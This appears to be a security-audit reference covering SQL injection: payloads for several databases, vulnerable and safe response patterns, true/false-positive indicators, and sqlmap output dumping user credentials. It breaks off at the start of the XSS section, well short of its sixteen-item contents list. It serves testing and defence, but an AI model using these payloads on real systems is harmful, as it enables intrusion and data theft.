# Attack Payloads & Response Patterns Reference > Comprehensive reference for security audit simulation: real-world payloads, vulnerable/safe response patterns, tool output formats, and true/false positive indicators. --- ## Table of Contents 1. [SQL Injection](#1-sql-injection) 2. [Cross-Site Scripting (XSS)](#2-cross-site-scripting-xss) 3. [Server-Side Request Forgery (SSRF)](#3-server-side-request-forgery-ssrf) 4. [IDOR / BOLA](#4-idor--bola-broken-object-level-authorization) 5. [Server-Side Template Injection (SSTI)](#5-server-side-template-injection-ssti) 6. [Authentication Bypass / Default Credentials](#6-authentication-bypass--default-credentials) 7. [Security Misconfiguration](#7-security-misconfiguration) 8. [Cryptographic Failures](#8-cryptographic-failures) 9. [CSRF](#9-csrf-cross-site-request-forgery) 10. [XXE](#10-xxe-xml-external-entity) 11. [Path Traversal / LFI](#11-path-traversal--lfi) 12. [Command Injection](#12-command-injection) 13. [File Upload Vulnerabilities](#13-file-upload-vulnerabilities) 14. [Rate Limiting / Brute Force](#14-rate-limiting--brute-force) 15. [Open Redirect](#15-open-redirect) 16. [Information Disclosure](#16-information-disclosure) --- ## 1. SQL Injection ### 1.1 Test Payloads #### Error-Based SQL Injection ``` # Basic error trigger ' " ' OR '1'='1 " OR "1"="1 ') OR ('1'='1 ' OR 1=1-- ' OR 1=1# ' OR 1=1/* admin'-- 1' AND 1=CONVERT(int,(SELECT @@version))-- # MySQL error-based extraction ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- ' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))-- ' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user()),0x7e),1)-- # MSSQL error-based ' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))-- ' AND 1=CAST((SELECT @@version) AS int)-- # Oracle error-based ' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual))-- ' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))-- # PostgreSQL error-based ' AND 1=CAST((SELECT version()) AS int)-- ',CAST(chr(126)||version()||chr(126) AS NUMERIC),'')-- ``` #### Union-Based SQL Injection ``` # Step 1: Determine column count with ORDER BY ' ORDER BY 1-- ' ORDER BY 2-- ' ORDER BY 3-- ' ORDER BY 4-- <-- if this errors, table has 3 columns # Step 1 alt: Determine column count with UNION SELECT NULL ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- # Step 2: Find displayable columns ' UNION SELECT 'a',NULL,NULL-- ' UNION SELECT NULL,'a',NULL-- ' UNION SELECT NULL,NULL,'a'-- # Step 3: Extract data (3-column example) ' UNION SELECT username,password,NULL FROM users-- ' UNION SELECT table_name,NULL,NULL FROM information_schema.tables-- ' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'-- ' UNION ALL SELECT NULL,CONCAT(username,0x3a,password),NULL FROM users-- # MySQL specific ' UNION SELECT 1,GROUP_CONCAT(schema_name),3 FROM information_schema.schemata-- ' UNION SELECT 1,GROUP_CONCAT(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- # PostgreSQL specific ' UNION SELECT NULL,version(),NULL-- ' UNION SELECT NULL,string_agg(table_name,','),NULL FROM information_schema.tables-- ``` #### Blind SQL Injection (Boolean-Based) ``` # Boolean-based detection ' AND 1=1-- (true condition - normal response) ' AND 1=2-- (false condition - different response) # Character extraction ' AND SUBSTRING((SELECT database()),1,1)='a'-- ' AND (SELECT ASCII(SUBSTRING((SELECT database()),1,1)))>97-- ' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND LENGTH(password)>5)=1-- # MySQL ' AND IF(1=1,1,0)-- ' AND IF(SUBSTRING(database(),1,1)='s',SLEEP(0),1)-- # PostgreSQL ' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 1/(SELECT 0) END)=1-- ``` #### Blind SQL Injection (Time-Based) ``` # MySQL ' AND SLEEP(5)-- ' AND IF(1=1,SLEEP(5),0)-- ' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)-- '; SELECT BENCHMARK(10000000,SHA1('test'))-- # PostgreSQL '; SELECT pg_sleep(5)-- ' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)-- # MSSQL '; WAITFOR DELAY '0:0:5'-- ' AND IF 1=1 WAITFOR DELAY '0:0:5'-- '; IF (SELECT COUNT(*) FROM sysobjects)>0 WAITFOR DELAY '0:0:5'-- # Oracle ' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)-- ``` ### 1.2 Vulnerable Response Patterns #### HTTP Response - Error-Based (MySQL) ```http HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=utf-8 Server: Apache/2.4.41 (Ubuntu) Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/index.php on line 12
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 ``` #### HTTP Response - Error-Based (MSSQL) ```http HTTP/1.1 500 Internal Server Error Content-Type: text/html Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark after the character string ''. /products.asp, line 33 ``` #### HTTP Response - Error-Based (Oracle) ```http HTTP/1.1 500 Internal Server Error ORA-01756: quoted string not properly terminated ORA-00933: SQL command not properly ended ``` #### HTTP Response - Error-Based (PostgreSQL) ```http HTTP/1.1 500 Internal Server Error ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM products WHERE id='1'' ERROR: invalid input syntax for type integer: "abc" ``` #### HTTP Response - Union-Based (Data Exfiltration) ```http HTTP/1.1 200 OK Content-Type: text/html
admin$2b$12$LJ3m4ys3Lk0TdPmFBpKBOeJMUMmo7Xa5VjKfAPeXBqHVjE9P5VqiG
john$2b$12$9XNHnKz.LmQZGKISYhECY.IH0d1pYR/lFaXEPt3HvSbDYpNGoEi1u
``` #### HTTP Response - Boolean Blind (True vs False) ``` # TRUE condition (' AND 1=1--) HTTP/1.1 200 OK Content-Length: 4538

Product: Widget Pro

Price: $29.99

# FALSE condition (' AND 1=2--) HTTP/1.1 200 OK Content-Length: 1204

No products found

``` #### HTTP Response - Time-Based Blind ``` # Non-injected request: Response time ~50ms # Injected with SLEEP(5): Response time ~5050ms # The 5-second delay confirms injection ``` ### 1.3 Safe/Patched Response Patterns ```http HTTP/1.1 400 Bad Request Content-Type: application/json { "error": "Invalid input", "message": "The provided value is not valid" } ``` ```http HTTP/1.1 200 OK Content-Type: application/json { "products": [], "message": "No results found" } ``` Key safe indicators: - No database error messages leaked - Parameterized query used (payload treated as literal string data) - Input validation rejects special characters - Generic error messages with no stack traces - Same response for both `' AND 1=1--` and `' AND 1=2--` - No measurable time difference with SLEEP/WAITFOR payloads ### 1.4 True Positive vs False Positive | Indicator | True Positive | False Positive | |-----------|---------------|----------------| | Error message | Contains DB-specific syntax errors (MySQL, MSSQL, Oracle, PG) | Generic 500 error or WAF block page | | Boolean blind | Consistently different response for true/false conditions across multiple tests | Single inconsistent difference (could be caching, race condition) | | Time-based | Consistent delay matching injected sleep value (e.g., 5s for SLEEP(5), 10s for SLEEP(10)) | Random delays due to server load | | Union-based | Actual data from other tables appears in response | Extra columns show NULL but no extractable data | | WAF detection | Payload blocked with WAF signature (403 Forbidden, "Request blocked") | Actual SQL syntax error from the database engine | ### 1.5 Tool Output Examples #### sqlmap Output (Vulnerable Target) ``` ___ __H__ ___ ___["]_____ ___ ___ {1.8.4#stable} |_ -| . [(] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal... [*] starting @ 14:23:15 /2026-04-09/ [14:23:15] [INFO] testing connection to the target URL [14:23:15] [INFO] checking if the target is protected by some kind of WAF/IPS [14:23:15] [INFO] testing if the target URL content is stable [14:23:16] [INFO] target URL content is stable [14:23:16] [INFO] testing if GET parameter 'id' is dynamic [14:23:16] [INFO] GET parameter 'id' appears to be dynamic [14:23:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [14:23:16] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks [14:23:16] [INFO] testing for SQL injection on GET parameter 'id' [14:23:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:23:17] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [14:23:17] [INFO] testing 'Generic inline queries' [14:23:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [14:23:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [14:23:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [14:23:18] [INFO] GET parameter 'id' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' injectable [14:23:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [14:23:28] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [14:23:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [14:23:28] [INFO] automatically extending ranges for UNION query injection technique tests [14:23:29] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. [14:23:29] [INFO] target URL appears to have 3 columns in query [14:23:30] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 5639=5639 AND 'RdBg'='RdBg Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP) Payload: id=1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716b787871,(SELECT (ELT(4207=4207,1))),0x71766a7a71,0x78))x))-- - Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5765 FROM (SELECT(SLEEP(5)))SuCe) AND 'vbKl'='vbKl Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-7092' UNION ALL SELECT CONCAT(0x716b787871,0x4f724d6f4c52634f6c72,0x71766a7a71),NULL,NULL-- - --- [14:23:30] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: PHP 7.4.3, Apache 2.4.41 back-end DBMS: MySQL >= 5.5 [14:23:30] [INFO] fetched data logged to text files under '/home/user/.local/share/sqlmap/output/target.example.com' [*] ending @ 14:23:30 /2026-04-09/ ``` #### sqlmap Database Enumeration Output ``` [14:25:01] [INFO] fetching database names available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] webapp_db [14:25:02] [INFO] fetching tables for database: 'webapp_db' Database: webapp_db [3 tables] +-----------+ | users | | products | | orders | +-----------+ [14:25:03] [INFO] fetching columns for table 'users' in database 'webapp_db' Database: webapp_db Table: users [4 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int(11) | | username | varchar(50) | | password | varchar(255)| | email | varchar(100)| +----------+-------------+ [14:25:04] [INFO] fetching entries for table 'users' in database 'webapp_db' Database: webapp_db Table: users [3 entries] +----+----------+----------------------------------------------+-------------------+ | id | username | password | email | +----+----------+----------------------------------------------+-------------------+ | 1 | admin | $2b$12$LJ3m4ys3Lk0TdPmFBpKBOeJMUMmo7Xa5VjKf | admin@example.com | | 2 | john | 5f4dcc3b5aa765d61d8327deb882cf99 | john@example.com | | 3 | jane | password123 | jane@example.com | +----+----------+----------------------------------------------+-------------------+ ``` --- ## 2. Cross-Site Scripting (XSS) ### 2.1 Test Payloads #### Reflected XSS ``` # Basic payloads "> '>